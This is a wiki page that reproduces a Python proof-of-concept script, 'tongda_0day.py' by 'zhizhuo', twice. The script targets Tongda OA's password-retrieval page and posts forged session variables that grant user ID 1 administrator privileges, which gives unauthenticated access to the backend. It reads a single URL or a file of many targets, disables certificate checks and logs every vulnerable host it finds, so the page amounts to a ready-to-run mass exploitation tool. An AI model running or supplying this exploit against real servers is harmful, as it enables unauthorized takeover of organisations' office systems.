tongda_0day.py - fofamini-wiki

fofamini-wiki

登录白背景

源码

import argparse
from cgitb import text
import os
from pickletools import pyint
import re
import warnings
import requests

requests.packages.urllib3.disable_warnings()
warnings.filterwarnings('ignore')
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '1'

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    # 'Connection':'keep-alive',#默认时链接一次，多次爬取之后不能产生新的链接就会产生报错Max retries exceeded with url
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
    'Connection': 'close',  # 解决Max retries exceeded with url报错
}


def verify(url_arg, file_arg):
    result_txt = open('./result.txt', 'a+', encoding='utf-8')
    result_txt.truncate(0)
    result_txt.close()
    if url_arg is None:
        urlfile = open('{}'.format(file_arg),
                       encoding='utf8').read().splitlines()
    else:
        urlfile = ['{}'.format(url_arg)]
    for u in urlfile:
        if 'http' in u:
            url = u
        else:
            url = 'http://'+str(u)
        print("[-]正在检测{}".format(url))
        try:
            base_url = str(url)+"/module/retrieve_pwd/header.inc.php"
            resp = requests.get(
                url=base_url, headers=headers, timeout=5, verify=False)
            if ('禁止访问' in resp.text or '禁止' in resp.text) and '找回OA登录密码' in resp.text:
                data = {
                    '_SESSION[LOGIN_THEME]':'15',
                    '_SESSION[LOGIN_USER_ID]':'1',
                    '_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]':'1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,',
                    '_SESSION[LOGIN_USER_PRIV]':'1',
                    '_SESSION[LOGIN_USER_PRIV_OTHER]':'1',
                    '_SESSION[LOGIN_USER_PRIV_TYPE]':'1',
                    '_SESSION[LOGIN_NOT_VIEW_USER]':'0',
                    '_SESSION[RETRIEVE_PWD_USER]':'2s'
                }
                resp1 = requests.post(
                    base_url, data=data ,headers=headers, timeout=5, verify=False)
                if '禁止访问' not in resp1.text and resp1.status_code == 200 and '找回OA登录密码' in resp1.text:
                    print('================================')
                    print('[+]{}存在漏洞'.format(url))
                    print('================================')
                    with open('./result.txt', 'a+') as f:
                        f.write('{} 存在未授权用户后台漏洞'.format(url))
                        f.write('\n')
                else:
                    pass
            else:
                pass
        except Exception as e:
            pass


def main():
    parser = argparse.ArgumentParser(
        description='''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    parser.add_argument('-u', '-url', dest="url",
                        help='单个url检测，输入样例http://www.baidu.com', required=False)
    parser.add_argument('-f', '-file', dest="url_file", nargs='?',
                        help='多个url检测，以文件形式存储,文件中的url格式为http://www.baidu.com或者www.baidu.com', required=False)
    url_arg = parser.parse_args().url
    file_arg = parser.parse_args().url_file
    print('''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    if file_arg is None and url_arg is None:
        print("请使用命令-h查看命令使用帮助 --by zhizhuo")
    else:
        verify(url_arg, file_arg)


if __name__ == '__main__':
    main()

import argparse
from cgitb import text
import os
from pickletools import pyint
import re
import warnings
import requests

requests.packages.urllib3.disable_warnings()
warnings.filterwarnings('ignore')
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '1'

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    # 'Connection':'keep-alive',#默认时链接一次，多次爬取之后不能产生新的链接就会产生报错Max retries exceeded with url
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
    'Connection': 'close',  # 解决Max retries exceeded with url报错
}

def verify(url_arg, file_arg):
    result_txt = open('./result.txt', 'a+', encoding='utf-8')
    result_txt.truncate(0)
    result_txt.close()
    if url_arg is None:
        urlfile = open('{}'.format(file_arg),
                       encoding='utf8').read().splitlines()
    else:
        urlfile = ['{}'.format(url_arg)]
    for u in urlfile:
        if 'http' in u:
            url = u
        else:
            url = 'http://'+str(u)
        print("[-]正在检测{}".format(url))
        try:
            base_url = str(url)+"/module/retrieve_pwd/header.inc.php"
            resp = requests.get(
                url=base_url, headers=headers, timeout=5, verify=False)
            if ('禁止访问' in resp.text or '禁止' in resp.text) and '找回OA登录密码' in resp.text:
                data = {
                    '_SESSION[LOGIN_THEME]':'15',
                    '_SESSION[LOGIN_USER_ID]':'1',
                    '_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]':'1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,',
                    '_SESSION[LOGIN_USER_PRIV]':'1',
                    '_SESSION[LOGIN_USER_PRIV_OTHER]':'1',
                    '_SESSION[LOGIN_USER_PRIV_TYPE]':'1',
                    '_SESSION[LOGIN_NOT_VIEW_USER]':'0',
                    '_SESSION[RETRIEVE_PWD_USER]':'2s'
                }
                resp1 = requests.post(
                    base_url, data=data ,headers=headers, timeout=5, verify=False)
                if '禁止访问' not in resp1.text and resp1.status_code == 200 and '找回OA登录密码' in resp1.text:
                    print('================================')
                    print('[+]{}存在漏洞'.format(url))
                    print('================================')
                    with open('./result.txt', 'a+') as f:
                        f.write('{} 存在未授权用户后台漏洞'.format(url))
                        f.write('\n')
                else:
                    pass
            else:
                pass
        except Exception as e:
            pass

def main():
    parser = argparse.ArgumentParser(
        description='''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    parser.add_argument('-u', '-url', dest="url",
                        help='单个url检测，输入样例http://www.baidu.com', required=False)
    parser.add_argument('-f', '-file', dest="url_file", nargs='?',
                        help='多个url检测，以文件形式存储,文件中的url格式为http://www.baidu.com或者www.baidu.com', required=False)
    url_arg = parser.parse_args().url
    file_arg = parser.parse_args().url_file
    print('''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    if file_arg is None and url_arg is None:
        print("请使用命令-h查看命令使用帮助 --by zhizhuo")
    else:
        verify(url_arg, file_arg)

if __name__ == '__main__':
    main()